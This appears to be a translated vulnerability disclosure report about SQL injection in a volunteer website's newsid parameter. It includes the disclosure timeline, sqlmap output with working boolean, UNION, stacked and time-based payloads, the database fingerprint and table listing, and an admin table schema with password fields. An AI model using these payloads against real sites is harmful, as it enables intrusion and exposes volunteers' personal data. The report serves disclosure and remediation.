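2015-10-27: Details reported to the vendor; awaiting vendor handling
2015-10-30: Vendor confirmed; details disclosed to the vendor only
2015-11-09: Details disclosed to core white hats and experts in related fields
2015-11-19: Details disclosed to regular white hats
2015-11-29: Details disclosed to trainee white hats
2015-12-14: Details disclosed to the public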
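As the title says.
Link: http://**.**.**.**/volunteers/ShowPage.aspx?newsid=9938
SQL injection in a volunteer website, exposing the records of over ten thousand volunteers (name/school/photo/mobile number/birthday/address, etc.)
17212 records in total, 574 pages, currently on page 1, 30 records per page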
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: newsid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=9938' AND 7081=7081 AND 'YNze'='YNze

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: newsid=-1077' UNION ALL SELECT CHAR(58) CHAR(115) CHAR(112) CHAR(9) CHAR(58) CHAR(67) CHAR(102) CHAR(68) CHAR(79) CHAR(109) CHAR(87) CHAR(70) CHA(101) CHAR(77) CHAR(102) CHAR(58) CHAR(119) CHAR(112) CHAR(105) CHAR(58),NULL,NLL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: newsid=9938'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: newsid=9938' WAITFOR DELAY '0:0:5'--
---
[20:20:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[20:20:20] [INFO] fetching tables for database: hds0280121_db
available databases [3]:
[*] hds0280121_db
[*] master
[*] tempdb
current database: 'hds0280121_db'

Database: hds0280121_db
[103 tables]

Database: hds0280121_db
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.dnt_pms                | 112717  |
| dbo.dnt_userfields         | 75860   |
| dbo.dnt_users              | 75856   |
| dbo.dnt_myposts            | 61409   |
| dbo.dnt_mytopics           | 41301   |
| dbo.dnt_posts1             | 22052   |
| dbo.Volunteers             | 17212   |
| dbo.smsSend                | 14729   |
| dbo.dnt_scheduledevents    | 7168    |
| dbo.dnt_myattachments      | 6477    |
| dbo.dnt_attachments        | 6475    |
| dbo.Dv_Upfile              | 6466    |
| dbo.Event_Info             | 4916    |
| dbo.event_images           | 4480    |
| dbo.article                | 3779    |
| dbo.diaodong_info          | 3332    |
| dbo.dnt_adminvisitlog      | 2189    |
| dbo.dnt_topics             | 1988    |
| dbo.dnt_onlinetime         | 1914    |
| dbo.dnt_statvars           | 1194    |
| dbo.dnt_trendstat          | 947     |
| dbo.sms_recv               | 848     |
| dbo.review                 | 685     |
| dbo.faq                    | 448     |
| dbo.dnt_moderatormanagelog | 199     |
| dbo.zy_unit                | 116     |
| dbo.dnt_smilies            | 88      |
| dbo.Art_class              | 57      |

Database: hds0280121_db
Table: admin
[12 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| id              | int      |
| is_checkSmsSend | bit      |
| name            | nvarchar |
| phone           | nvarchar |
| sign            | smallint |
| type            | bit      |
| typeidlist      | nvarchar |
| unit_id         | int      |
| userid          | nvarchar |
| userpwd         | nvarchar |
| zyunit_id       | int      |
| zyzhiweiID      | int      |
+-----------------+----------+

Database: hds0280121_db
Table: admin
[35 entries]
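Filter the input...
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-10-30 17:50
CNVD confirmed and reproduced the vulnerability as described and has handed it to CNCERT, which forwarded it to the corresponding regional branch; that branch will coordinate with the organization managing the website to handle it.
None yet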